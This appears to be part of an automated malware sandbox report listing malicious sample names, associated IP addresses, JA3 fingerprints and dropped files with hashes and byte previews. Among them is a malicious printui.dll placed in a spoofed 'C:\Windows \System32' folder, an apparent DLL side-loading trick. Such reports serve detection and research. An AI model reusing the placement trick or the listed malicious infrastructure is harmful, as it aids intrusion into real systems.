                                                                          ORDER-2412180Y6890PF57682456HTVC789378909759..jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                          • 199.232.192.209
                                                                          GOOGLE-AS-APGoogleAsiaPacificPteLtdSGdo.ps1Get hashmaliciousUnknownBrowse
                                                                          • 34.117.188.166
                                                                          YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                          • 34.117.59.81
                                                                          YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                          • 34.117.59.81
                                                                          arm5.nn-20241218-0633.elfGet hashmaliciousMirai, OkiruBrowse
                                                                          • 34.65.20.112
                                                                          https://walli.shanga.co/image/view/?id=1375Get hashmaliciousUnknownBrowse
                                                                          • 34.117.188.166
                                                                          http://inspirafinancial.comGet hashmaliciousUnknownBrowse
                                                                          • 34.117.77.79
                                                                          tightvnc-2.8.59-gpl-setup-64bit.msiGet hashmaliciousUnknownBrowse
                                                                          • 34.117.188.166
                                                                          https://bu.marcel-andree.de/Get hashmaliciousUnknownBrowse
                                                                          • 34.117.59.81
                                                                          174 Power Global_Enrollment_.docx.docGet hashmaliciousUnknownBrowse
                                                                          • 34.117.42.160
                                                                          174 Power Global_Enrollment_.docx.docGet hashmaliciousUnknownBrowse
                                                                          • 34.117.42.160
                                                                          MICROSOFT-CORP-MSN-AS-BLOCKUSLu4421.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                                          • 20.233.83.145
                                                                          http://trackmail.info/QLTRG66TP4/offer/00248/811/iuk7x/b4q/41/32Get hashmaliciousUnknownBrowse
                                                                          • 52.170.203.157
                                                                          EXTERNALRe.msgGet hashmaliciousUnknownBrowse
                                                                          • 52.182.143.210
                                                                          x0EMKX5G1g.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                          • 20.233.83.145
                                                                          https://syndiclair-my.sharepoint.com/:o:/g/personal/ml_syndiclair_fr/En8EbZMYpZ5CodZQ05mt4IMBGZHEHcSylnIeMh0DoULmZw?e=UkXb4YGet hashmaliciousUnknownBrowse
                                                                          • 13.107.136.10
                                                                          x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                          • 21.50.39.179
                                                                          mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                          • 21.52.221.95
                                                                          sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                          • 137.117.24.119
                                                                          arm5.nn-20241218-0633.elfGet hashmaliciousMirai, OkiruBrowse
                                                                          • 22.4.220.86
                                                                          arm.nn-20241218-0633.elfGet hashmaliciousMirai, OkiruBrowse
                                                                          • 52.155.199.154

                                                                          JA3 Fingerprints

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          bd0bf25947d4a37404f0424edf4db9addYUteuvmHn.exeGet hashmaliciousUnknownBrowse
                                                                          • 20.233.83.145
                                                                          • 185.199.110.133
                                                                          • 34.117.59.81
                                                                          SecuriteInfo.com.Win64.Evo-gen.6610.27408.exeGet hashmaliciousUnknownBrowse
                                                                          • 20.233.83.145
                                                                          • 185.199.110.133
                                                                          • 34.117.59.81
                                                                          SecuriteInfo.com.Win64.Evo-gen.9614.31304.exeGet hashmaliciousUnknownBrowse
                                                                          • 20.233.83.145
                                                                          • 185.199.110.133
                                                                          • 34.117.59.81
                                                                          SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeGet hashmaliciousUnknownBrowse
                                                                          • 20.233.83.145
                                                                          • 185.199.110.133
                                                                          • 34.117.59.81
                                                                          app64.exeGet hashmaliciousUnknownBrowse
                                                                          • 20.233.83.145
                                                                          • 185.199.110.133
                                                                          • 34.117.59.81
                                                                          SecuriteInfo.com.FileRepMalware.12585.5759.exeGet hashmaliciousUnknownBrowse
                                                                          • 20.233.83.145
                                                                          • 185.199.110.133
                                                                          • 34.117.59.81
                                                                          SecuriteInfo.com.Trojan.GenericKD.74444428.17336.1019.exeGet hashmaliciousUnknownBrowse
                                                                          • 20.233.83.145
                                                                          • 185.199.110.133
                                                                          • 34.117.59.81
                                                                          SecuriteInfo.com.Trojan.GenericKD.74444428.17336.1019.exeGet hashmaliciousUnknownBrowse
                                                                          • 20.233.83.145
                                                                          • 185.199.110.133
                                                                          • 34.117.59.81
                                                                          sadfwqefrqw3f.exeGet hashmaliciousUnknownBrowse
                                                                          • 20.233.83.145
                                                                          • 185.199.110.133
                                                                          • 34.117.59.81
                                                                          SecuriteInfo.com.Win64.Evo-gen.20107.17462.exeGet hashmaliciousUnknownBrowse
                                                                          • 20.233.83.145
                                                                          • 185.199.110.133
                                                                          • 34.117.59.81

                                                                          Dropped Files

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          C:\Windows \System32\printui.exedYUteuvmHn.exeGet hashmaliciousUnknownBrowse
                                                                            SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeGet hashmaliciousUnknownBrowse
                                                                              app64.exeGet hashmaliciousUnknownBrowse
                                                                                printui.dllGet hashmaliciousUnknownBrowse
                                                                                  SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeGet hashmaliciousUnknownBrowse
                                                                                    F.7zGet hashmaliciousUnknownBrowse
                                                                                      Ld0f3NDosJ.exeGet hashmaliciousUnknownBrowse
                                                                                        C:\Windows \System32\printui.dllLd0f3NDosJ.exeGet hashmaliciousUnknownBrowse

                                                                                          Created / dropped Files

                                                                                          C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):1310720
                                                                                          Entropy (8bit):0.72634112734243
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0O:9JZj5MiKNnNhoxuv
                                                                                          MD5:7E57EADED0C9A2452DDBB1A9885BE0C0
                                                                                          SHA1:43D8F05890CE6948F44056B666F05BC9B7507D13
                                                                                          SHA-256:27B77A01CDD6C95DA8562C2DE161196F302D187981FB828B7A87C99A76244F34
                                                                                          SHA-512:AD954E07F0A63733E543530890A3D86B42A9828C76AD98C665D8D6B407287701A473DAD95FDDC3652B5578F682B833CB02379AE39C962CE877FE6E3152CF3EEE
                                                                                          Malicious:false
                                                                                          Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                          File Type:Extensible storage user DataBase, version 0x620, checksum 0x81761177, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                          Category:dropped
                                                                                          Size (bytes):1310720
                                                                                          Entropy (8bit):0.7556167585716443
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:NSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:NazaSvGJzYj2UlmOlOL
                                                                                          MD5:B230835CFF75C857EC373863AAD2B66D
                                                                                          SHA1:0F2089BDD8B791061A3979F5A7543935D6E40F30
                                                                                          SHA-256:9F163F9F3E63158851905DE6A5BF873D8BF64133F294906E6960DDACC27AAC70
                                                                                          SHA-512:C728D33722C811EB15B9218DDBF06B48A1BAC4B47A54FB0A5E07D814D44D6B1046CBDE1DD86A838D7A204004839F184B3B8A9A4CB6493A0FDF6D8F74AE4444BB
                                                                                          Malicious:false
                                                                                          Preview:.v.w... .......7.......X\...;...{......................0.e......!...{?..)...|c.h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{..................................t...)...|c..................v.&.)...|c..........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):16384
                                                                                          Entropy (8bit):0.07902106620261667
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:9rlSl8YeMvnIKg3NaAPaU1lOw3K/lAlluxmO+l/SNxOf:26z8n9ANDPaU2jAgmOH
                                                                                          MD5:C5E017BC6A66B4F63025B198467EC509
                                                                                          SHA1:E9BF5DD4CF63112A9A42C9D0B4A0DD8D7F697534
                                                                                          SHA-256:878D73D1DF80A37E9312FF1E8980636E93D14BCAD31BA547259BAEBD612960B4
                                                                                          SHA-512:F5779F8B4D43D95D39A79D43BCE8813FBE567F923EF66B7F0760F7B657E6DEC6C408C80B28ACFD1FF93BAB989348E5AB0631EC222792829369720E9D61DFF6D7
                                                                                          Malicious:false
                                                                                          Preview:.........................................;...{...)...|c..!...{?..........!...{?..!...{?..g...!...{?..................v.&.)...|c.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\Public\tmp.enc

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\crypti.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):16
                                                                                          Entropy (8bit):3.875
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:ktUOI2Gn:kI2Gn
                                                                                          MD5:B101F729FB1107BF23CE00FBF4A10A7F
                                                                                          SHA1:A65B1C3C3C56A10D62B8FF00E7F10BA1E54AA58B
                                                                                          SHA-256:B2F87025C70B31CBF2BC3E3A6995A93B0F469A8D72AB7E45C73D1DCFB49135CB
                                                                                          SHA-512:8FA5EE1410B19549497D974F705D95ED603E59AE1BAD3D6DCBC0AB7B9AE41242C3871CAF7354163692154D80990EB3788670F084650CE32EBE94E1508CB9CB96
                                                                                          Malicious:false
                                                                                          Preview:!...S..%.e..-.c

                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):64
                                                                                          Entropy (8bit):0.34726597513537405
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Nlll:Nll
                                                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                          Malicious:false
                                                                                          Preview:@...e...........................................................

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_04fd2uyn.3br.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0nwmy1vk.sf2.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_113zggph.4pn.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3kfxakfq.w3l.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4pjk5cii.bbc.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cfstdweh.4hx.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ecjljzvj.trm.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hoqbyf3e.c35.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hz02t42m.s40.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i5w0z5r2.cfz.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iaatapx2.u4i.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qlfweygg.4n5.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vk2cvq4y.ydq.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w4ud0ney.33g.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_winpv0wk.u23.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x1zem5au.l0h.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Windows \System32\printui.dll

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\usvcinsta64.exe
                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):14262784
                                                                                          Entropy (8bit):6.551982111344916
                                                                                          Encrypted:false
                                                                                          SSDEEP:393216:BPsdXtBcda7nzo7Vd7Qv1CPwDvt3uFRCvfxlXnwXAaGueVW3XSdEVB3:BITkS6
                                                                                          MD5:6CD5395F5675ABBF7644268F0023B0BD
                                                                                          SHA1:F64379354EF7D7261D7C8250F98C515DDBDF577D
                                                                                          SHA-256:397A1DD2D8DCDE26F5D22AE33AFBF6C6201920F8D27EE213B65896FE99944239
                                                                                          SHA-512:5CBD0A6346638FEC900723CD0FECFBE6A7E8449175F297462EFFC92B4436737F4CC9C433F94A0F61F89DEC1F77EF56132CB750AFAE4E7AA57CA318DA3DDA9BDA
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 75%
                                                                                          Joe Sandbox View:
                                                                                          • Filename: Ld0f3NDosJ.exe, Detection: malicious, Browse
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B...#.X.#.X.#.X...Y`#.X...Y.#.X...Y.#.X..Y.#.X..Y.#.X..Y.#.X...Y.#.X.#.XZ#.X...Y.#.X..vX.#.X...Y.#.XRich.#.X................PE..d....B.f.........." ...). ..........(}....................................................`..................................................O..<................,......................8...........................P...@............0..H............................text............ .................. ..`.rdata...*...0...,...$..............@..@.data....*...`.......P..............@....pdata...,...........f..............@..@.fptable............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................

                                                                                          C:\Windows \System32\printui.exe

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\usvcinsta64.exe
                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):64000
                                                                                          Entropy (8bit):6.336447440888565
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:a4uHmXrH60qKdC5vI1iQfCIWVM9G4qW4ne+S/ly+PKAoXRZX6fbX57UWkCRPPA7f:Uca1KAVIPd4n+lbeRZIbSQPPA7f
